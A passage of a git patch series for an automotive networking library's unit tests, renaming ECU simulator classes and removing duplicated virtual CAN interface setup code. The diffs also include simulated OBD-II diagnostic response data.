max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=134, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=135, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=64)/OBD_MID40(supported_mids=3221225473)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=65)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=22, test_value=720.0, min_limit=700.0, max_limit=6513.5)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=66)/OBD_MIDXX(standardized_test_id=144, unit_and_scaling_id=20, test_value=401, min_limit=0, max_limit=800)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=96)/OBD_MID60(supported_mids=1)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=71)/OBD_S07_PR(count=0)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=0)/OBD_IID00(supported_iids=1430405120)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=10)/OBD_IID0A(ecu_names=[b'ECM\x00-EngineControl\x00\x00'], count=1)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=15)/Raw(load=b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00HM0876')])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=18)/Raw(load=b'\x01\x00\xd5')])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=2)/OBD_IID02(vehicle_identification_numbers=[b'WDD1xxxxxxxxxxx11'], count=1)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=4)/OBD_IID04(calibration_identifications=[b'282xxxxxxx300044', b'00090xxxxxx00031'], count=2)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=6)/OBD_IID06(calibration_verification_numbers=[b'\xf9\x10\xb9\xfb', b'&6"e'], count=2)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=8)/OBD_IID08(data=[9, 189, 8, 9, 0, 0, 8, 9, 0, 0, 22, 9, 0, 0, 0, 0, 8, 9, 0, 0], count=20)])), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=49)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=49)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=49)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=17)), - ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=49))] + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=1)/OBD_PID01(mil=0, dtc_count=0, reserved1=0, continuous_tests_ready=0, reserved2=0, continuous_tests_supported=7, once_per_trip_tests_supported=225, once_per_trip_tests_ready=0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=11)/OBD_PID0B(data=44)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=12)/OBD_PID0C(data=857.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=13)/OBD_PID0D(data=0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=14)/OBD_PID0E(data=3.5)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=15)/OBD_PID0F(data=22.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=17)/OBD_PID11(data=14.51)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=19)/OBD_PID13(sensors_present=3)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=21)/OBD_PID15(outputVoltage=1.275, trim=99.219)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=28)/OBD_PID1C(data=6)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=3)/OBD_PID03(fuel_system1=2, fuel_system2=0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=31)/OBD_PID1F(data=13)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=32)/OBD_PID20(supported_pids=2684465153)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=33)/OBD_PID21(data=0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=35)/OBD_PID23(data=24910)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=4)/OBD_PID04(data=9.804)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=48)/OBD_PID30(data=19)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=49)/OBD_PID31(data=3587)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=5)/OBD_PID05(data=41.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=51)/OBD_PID33(data=97)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=52)/OBD_PID34(equivalence_ratio=1.001, current=128.004)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=6)/OBD_PID06(data=0.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=64)/OBD_PID40(supported_pids=244352000)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=69)/OBD_PID45(data=3.922)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=7)/OBD_PID07(data=-0.781)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=70)/OBD_PID46(data=20.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=71)/OBD_PID47(data=12.549)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=73)/OBD_PID49(data=5.49)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=76)/OBD_PID4C(data=3.922)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=81)/OBD_PID51(data=1)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=86)/OBD_PID56(bank1=0.0)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=67)/OBD_S03_PR(count=0)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=0)/OBD_MID00(supported_mids=3221225473)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=4, test_value=0.0, min_limit=0.0, max_limit=1.0),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=138, unit_and_scaling_id=132, test_value=0.996, min_limit=-32.768, max_limit=1.06),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=139, unit_and_scaling_id=132, test_value=0.996, min_limit=0.94, max_limit=32.767)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=128)/OBD_MID80(supported_mids=1)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=160)/OBD_MIDA0(supported_mids=4160749568)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=161)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=2, min_limit=0, max_limit=65535)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=145, unit_and_scaling_id=177, test_value=3944, min_limit=900, max_limit=65534),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=149, unit_and_scaling_id=10, test_value=764.696, min_limit=719.556, max_limit=7995.27),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=150, unit_and_scaling_id=10, test_value=115.412, min_limit=0.0, max_limit=179.95)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=32)/OBD_MID20(supported_mids=2147485697)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=33)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=3, test_value=2.63, min_limit=1.0, max_limit=655.35)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=128, unit_and_scaling_id=28, test_value=32.42, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=129, unit_and_scaling_id=28, test_value=25.41, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=130, unit_and_scaling_id=28, test_value=0.21, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=28, test_value=0.0, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=134, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=135, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=64)/OBD_MID40(supported_mids=3221225473)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=65)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=22, test_value=720.0, min_limit=700.0, max_limit=6513.5)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=66)/OBD_MIDXX(standardized_test_id=144, unit_and_scaling_id=20, test_value=401, min_limit=0, max_limit=800)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=96)/OBD_MID60(supported_mids=1)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=71)/OBD_S07_PR(count=0)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=0)/OBD_IID00(supported_iids=1430405120)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=10)/OBD_IID0A(ecu_names=[b'ECM\x00-EngineControl\x00\x00'], count=1)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=15)/Raw(load=b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00HM0876')])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=18)/Raw(load=b'\x01\x00\xd5')])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=2)/OBD_IID02(vehicle_identification_numbers=[b'WDD1xxxxxxxxxxx11'], count=1)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=4)/OBD_IID04(calibration_identifications=[b'282xxxxxxx300044', b'00090xxxxxx00031'], count=2)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=6)/OBD_IID06(calibration_verification_numbers=[b'\xf9\x10\xb9\xfb', b'&6"e'], count=2)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=8)/OBD_IID08(data=[9, 189, 8, 9, 0, 0, 8, 9, 0, 0, 22, 9, 0, 0, 0, 0, 8, 9, 0, 0], count=20)])), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=49)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=49)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=49)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=17)), + EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=49))] + Simulate scanner @@ -216,7 +216,7 @@ exit_if_no_isotp_module() drain_bus(iface0) with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) + answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: @@ -259,7 +259,7 @@ exit_if_no_isotp_module() drain_bus(iface0) with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) + answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: @@ -302,7 +302,7 @@ exit_if_no_isotp_module() drain_bus(iface0) with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) + answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index a19d625baf4..6adda5555cc 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -99,7 +99,7 @@ assert dscpr.service == 0x50 assert dscpr.diagnosticSessionType == 0x09 assert dscpr.sessionParameterRecord == b"beef" -ecu = ECU() +ecu = Ecu() ecu.update(dscpr) assert ecu.current_session == 9 @@ -137,7 +137,7 @@ assert erpr.service == 0x51 assert erpr.resetType == 0x04 assert erpr.powerDownTime == 0x10 -ecu = ECU() +ecu = Ecu() ecu.current_security_level = 5 ecu.current_session = 3 ecu.communication_control = 4 @@ -193,7 +193,7 @@ sapr = UDS(b'\x67\x06') assert sapr.service == 0x67 assert sapr.securityAccessType == 0x6 -ecu = ECU() +ecu = Ecu() ecu.update(sapr) assert ecu.current_security_level == 6 @@ -235,7 +235,7 @@ ccpr = UDS(b'\x68\x01') assert ccpr.service == 0x68 assert ccpr.controlType == 0x1 -ecu = ECU() +ecu = Ecu() ecu.update(ccpr) assert ecu.communication_control == 1 diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index a221d8f65b3..16b6e5f9b31 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -12,7 +12,7 @@ from subprocess import call from scapy.contrib.automotive.ecu import * print("Set delay to lower utilization") -conf.contribs['ECU_am']['send_delay'] = 0.004 +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 = Definition of constants, utility functions and mock classes iface0 = "vcan0" iface1 = "vcan1" @@ -181,12 +181,12 @@ drain_bus(iface0) s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) -example_responses = [ECUResponse(session=range(0,255), security_level=0, responses=s3)] +example_responses = [EcuResponse(session=range(0, 255), security_level=0, responses=s3)] with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: conf.verb = -1 - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 15, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: @@ -217,20 +217,20 @@ s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50) # Create answers for 'supported PIDs scan' example_responses = \ - [ECUResponse(session=range(0, 255), security_level=0, responses=s3), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s6_mid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s8_tid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s9_iid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid03), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] + [EcuResponse(session=range(0, 255), security_level=0, responses=s3), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s6_mid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s8_tid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s9_iid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid03), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: @@ -262,20 +262,20 @@ s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50) # Create answers for 'supported PIDs scan' example_responses = \ - [ECUResponse(session=range(0, 255), security_level=0, responses=s3), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s6_mid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s8_tid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s9_iid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid03), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] + [EcuResponse(session=range(0, 255), security_level=0, responses=s3), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s6_mid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s8_tid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s9_iid00), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid03), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), + EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: @@ -299,11 +299,11 @@ drain_bus(iface0) # Add unsupported PID s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) -example_responses.append(ECUResponse(session=range(0,255), security_level=0, responses=s1_pid01)) +example_responses.append(EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid01)) with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: From ad15fa8053cedea99bd76a0ef96b66fab4f02864 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 3 Feb 2021 13:25:32 +0100 Subject: [PATCH 0494/1632] Remove redundant code in automotive unit tests (#3056) * Remove redundant code in automotive unit tests * Reorder code, add comments and further cleanup * Fix Windows builds * make headlines in comments * update after rebase --- test/contrib/automotive/ecu_am.uts | 123 +------------ test/contrib/automotive/gm/gmlanutils.uts | 121 +------------ test/contrib/automotive/interface_mockup.py | 191 ++++++++++++++++++++ test/contrib/automotive/obd/scanner.uts | 121 +------------ test/contrib/automotive/uds_utils.uts | 122 +------------ test/contrib/isotp.uts | 115 ++---------- test/contrib/isotpscan.uts | 126 +------------ test/tools/isotpscanner.uts | 106 +---------- test/tools/obdscanner.uts | 121 +------------ test/tools/xcpscanner.uts | 73 ++------ 10 files changed, 255 insertions(+), 964 deletions(-) create mode 100644 test/contrib/automotive/interface_mockup.py diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index ca2b085ba93..651c9cb2e06 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -5,123 +5,13 @@ ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import subprocess, sys import scapy.modules.six as six -from subprocess import call -from scapy.consts import LINUX - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) 